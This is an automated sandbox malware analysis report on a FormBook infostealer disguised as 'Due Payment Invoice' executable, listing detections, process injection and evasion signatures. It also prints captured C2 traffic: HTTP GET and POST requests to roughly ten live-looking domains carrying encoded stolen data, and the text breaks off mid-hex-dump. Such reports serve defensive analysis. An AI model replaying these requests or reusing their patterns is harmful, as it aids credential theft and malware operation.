
Windows Analysis Report
Due Payment Invoice PISS2024993.exe

Overview

General Information

Sample name: Due Payment Invoice PISS2024993.exe
Analysis ID: 1541207
MD5: e36a9532eb81c28dd0ed418c61774138
SHA1: 63842c24e62c29a7695134da51e6cfa7654ce2d4
SHA256: 5bf41f92b016c6c045f3b10573788b4c7cc6b11e20b2a57ae5d4943c1b160da4
Tags: exe, Formbook, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Due Payment Invoice PISS2024993.exe (PID: 1732 cmdline: "C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe" MD5: E36A9532EB81C28DD0ED418C61774138)
    • RegSvcs.exe (PID: 6564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cJjnESPXORw.exe (PID: 3648 cmdline: "C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xcopy.exe (PID: 6784 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
          • firefox.exe (PID: 4816 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe" , ParentImage: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe, ParentProcessId: 3648, ParentProcessName: cJjnESPXORw.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 6784, ProcessName: xcopy.exe
                No Suricata rule has matched


                AV Detection

                Source: Due Payment Invoice PISS2024993.exe | ReversingLabs: Detection: 34%
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: Due Payment Invoice PISS2024993.exe | Joe Sandbox ML: detected
                Source: Due Payment Invoice PISS2024993.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Due Payment Invoice PISS2024993.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: xcopy.pdbUGP source: RegSvcs.exe, 00000003.00000002.2419859326.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000003.2491694752.0000000000B18000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: IaWe.pdb source: Due Payment Invoice PISS2024993.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cJjnESPXORw.exe, 00000005.00000002.3911462074.000000000009E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2419783426.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2422109688.0000000002E0C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: IaWe.pdbSHA256J source: Due Payment Invoice PISS2024993.exe
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000006.00000003.2419783426.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2422109688.0000000002E0C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: RegSvcs.exe, 00000003.00000002.2419859326.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000003.2491694752.0000000000B18000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 6_2_0281C420 FindFirstFileW,FindNextFileW,FindClose | 6_2_0281C420
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Code function: 4x nop then jmp 01820538h | 0_2_018206C2
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 4x nop then xor eax, eax | 6_2_02809D90
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 4x nop then pop edi | 6_2_02822540
                Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_02E004DE
                Source: Joe Sandbox View | IP Address: 141.193.213.11 141.193.213.11
                Source: Joe Sandbox View | IP Address: 13.248.169.48 13.248.169.48
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /qq33/?pZxtux=i6Dk+UJVjxglEXs09Tl/1hzZ7yI7sWOV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnhTwiButew2EOfjMP80SRQHDkyyZg6sD1yMmsAnC5II4onw==&C6=EXkTb HTTP/1.1Host: www.ila.beautyAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GBPPQtbW1nqz4pZ5COE7r30blXJdgErW3TYP6jwHTnZcx3A==&C6=EXkTb HTTP/1.1Host: www.shintow.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mdol/?pZxtux=IBR/N437Xoj/lvQ/yaypF1iCxq0JhxtvQ9XvO2IN6lbwsaKUqIYSoc7J5DfSIcjVFUNu75pY4qnkQs5YcPPLlBdqXD3XopUqxrOy0G+yXtR7yOmR4k+PDTzACkBBVYCXxA==&C6=EXkTb HTTP/1.1Host: www.mireela.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uao9/?pZxtux=gsMVmNPJ8N9SSsJhvzgfzwwjqe07CXl0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAW4YYmA3iTr55JhOSegfIcMD9E8fUPg/eNtps2xYGlBIlpg==&C6=EXkTb HTTP/1.1Host: www.micrhyms.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA== HTTP/1.1Host: www.estrela-b.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /zdt7/?pZxtux=OdyTsfpKOp+FbfSBk3rtAPX6yl42tFHs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjAvSN+KGdO51cWhvQZ2fU2V4w5zpyWN4cvAtWl9PkRGGXA+g==&C6=EXkTb HTTP/1.1Host: www.meanttobebroken.orgAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /t2sm/?pZxtux=94IeUqPLX3ZZBpOBWJjj6w05jpTx/xHCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQBPJfdTEUnKSwwNjbiieOsGOn8kHnIz1RgyTaVPNwwy1Row==&C6=EXkTb HTTP/1.1Host: www.mjmegartravel.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /24sh/?pZxtux=M41UUGwRPTDcYYp7NjzFchXqTu9ohCG2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCRxVhWrTu2Hm15Y+EHLS69Aj11G8IhKuKDs0JHRlg0rr8yhA==&C6=EXkTb HTTP/1.1Host: www.energyparks.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /df5c/?pZxtux=iTGQ2f3/8wLaRYQP0xZx681X5jLmVFU/oLVVEoegdR+OVsnqcEQj6iurR8BAvDospkEZVkGP6nTG7c6sAiwUrDOAfXxLGlgGaAd3CytgAtbKInIGuq2UlXDJcOT7zCeYfw==&C6=EXkTb HTTP/1.1Host: www.theawareness.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /o5z9/?pZxtux=z11/8LNw/ilOmRo5iVplmq9QJ2/sY6O9S3jiPj8IKRvMXjps+f+3QxK4x8TDiA3fpLYwxgH4NhA45modVvBwao6NdyacUH38gYwDUqZfGQ230ajUqn4GEmUCWVLyRw7Now==&C6=EXkTb HTTP/1.1Host: www.ak711ka10.latAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.ila.beauty
                Source: global trafficDNS traffic detected: DNS query: www.shintow.net
                Source: global trafficDNS traffic detected: DNS query: www.mireela.pro
                Source: global trafficDNS traffic detected: DNS query: www.micrhyms.info
                Source: global trafficDNS traffic detected: DNS query: www.estrela-b.online
                Source: global trafficDNS traffic detected: DNS query: www.meanttobebroken.org
                Source: global trafficDNS traffic detected: DNS query: www.mjmegartravel.online
                Source: global trafficDNS traffic detected: DNS query: www.energyparks.net
                Source: global trafficDNS traffic detected: DNS query: www.theawareness.shop
                Source: global trafficDNS traffic detected: DNS query: www.ak711ka10.lat
                Source: unknownHTTP traffic detected: POST /ow7i/ HTTP/1.1Host: www.shintow.netAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.shintow.netReferer: http://www.shintow.net/ow7i/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 207Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 70 5a 78 74 75 78 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 63 33 30 6e 55 61 59 65 6e 52 4e 4b 6e 38 2f 72 58 6d 64 35 67 6d 65 70 45 4a 34 33 71 6d 64 4f 4b 63 2f 6d 30 43 4c 41 63 6b 69 53 56 75 50 41 2b 52 32 67 42 4b 2b 70 6c 64 6c 75 6e 78 52 43 58 57 66 48 52 6e 31 51 4f 75 46 37 76 6d 47 6b 61 75 4c 70 61 74 52 66 48 75 4d 31 58 62 6b 53 34 68 62 4b 36 69 6f 44 4c 48 73 39 78 71 64 67 4c 64 42 7a 4c 5a 46 5a 51 63 42 5a 63 54 4e 65 31 49 2f 70 6a 39 50 67 41 71 38 53 34 71 72 36 6a 68 46 47 2f 46 33 58 45 6b 5a 77 4c 4d 64 51 2b 51 31 63 47 35 61 52 72 57 52 34 64 50 2f 4a 54 35 31 45 62 44 71 44 50 41 3d Data Ascii: pZxtux=O4lQUcptNkK6uc30nUaYenRNKn8/rXmd5gmepEJ43qmdOKc/m0CLAckiSVuPA+R2gBK+pldlunxRCXWfHRn1QOuF7vmGkauLpatRfHuM1XbkS4hbK6ioDLHs9xqdgLdBzLZFZQcBZcTNe1I/pj9PgAq8S4qr6jhFG/F3XEkZwLMdQ+Q1cG5aRrWR4dP/JT51EbDqDPA=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:30:11 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 
66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:30:14 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 
66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:30:16 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 